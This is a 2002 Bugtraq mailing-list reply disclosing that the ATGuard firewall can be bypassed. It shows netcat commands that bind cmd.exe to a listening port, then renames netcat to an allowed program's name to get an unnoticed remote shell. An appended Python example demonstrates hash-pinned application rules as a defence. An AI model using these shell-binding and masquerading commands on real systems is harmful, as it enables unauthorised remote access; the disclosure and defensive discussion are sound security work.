Bugtraq mailing list archives
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
From: "BlueScreen" <BlueScreen () IT-Checkpoint net>
Date: Tue, 30 Apr 2002 13:40:32 +0200
As far as I see the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard-Problem still goes further, it is also a problem with inbound
connections.
I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).
So, I just did the following:
I:\>cd netcat
I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l
I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now I did the following:
I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-german
readers : 1 File copied :)
I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l
Trying it with telnet again, I got a very nice shell without any notice from
ATGuard.
That's why I also mentioned trojan horses in my Advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.
There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you.
Surely there is no ultimate way. But if you are not aware that a problem
exists, you can't think about solutions. Also, you perhaps will think that
your personal firewall is perfectly safe while it isn't.
Best regards,
-------------------------------------------------------
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de
==================================================================
To encrypt classified messages, please download and use this PGP-Key:
http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==================================================================
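The renaming test in the message above suggests an application rule that is matched on the executable's file name. The following is an added example, not part of the original post and not ATGuard's code: it compares a name-only rule with one that also pins the SHA-256 of the file contents recorded when the rule was created. The function names and the file contents are constructed for illustration.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def allow_by_name(rules, exe_path):
    """Weak rule: match on the file name only."""
    return os.path.basename(exe_path).lower() in rules


def allow_by_hash(rules, exe_path):
    """Pinned rule: the name must match AND the contents must hash to the recorded value."""
    pinned = rules.get(os.path.basename(exe_path).lower())
    return pinned is not None and pinned == sha256_of(exe_path)


def demo():
    """Constructed files stand in for the real binaries; returns the four decisions."""
    work = tempfile.mkdtemp()
    try:
        server = os.path.join(work, "server", "xiwin32.exe")
        other = os.path.join(work, "tools", "nc.exe")
        renamed = os.path.join(work, "tools", "xiwin32.exe")
        for path, body in ((server, b"constructed web server image"),
                           (other, b"constructed different program image")):
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        shutil.copyfile(other, renamed)  # same step as "copy nc.exe xiwin32.exe"
        rules = {"xiwin32.exe": sha256_of(server)}  # recorded when the rule was created
        return {
            "name_server": allow_by_name(rules, server),
            "name_renamed": allow_by_name(rules, renamed),
            "hash_server": allow_by_hash(rules, server),
            "hash_renamed": allow_by_hash(rules, renamed),
        }
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print(demo())
```

A pinned hash has to be re-recorded whenever the allowed program is legitimately updated, which is the operational cost of this check.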
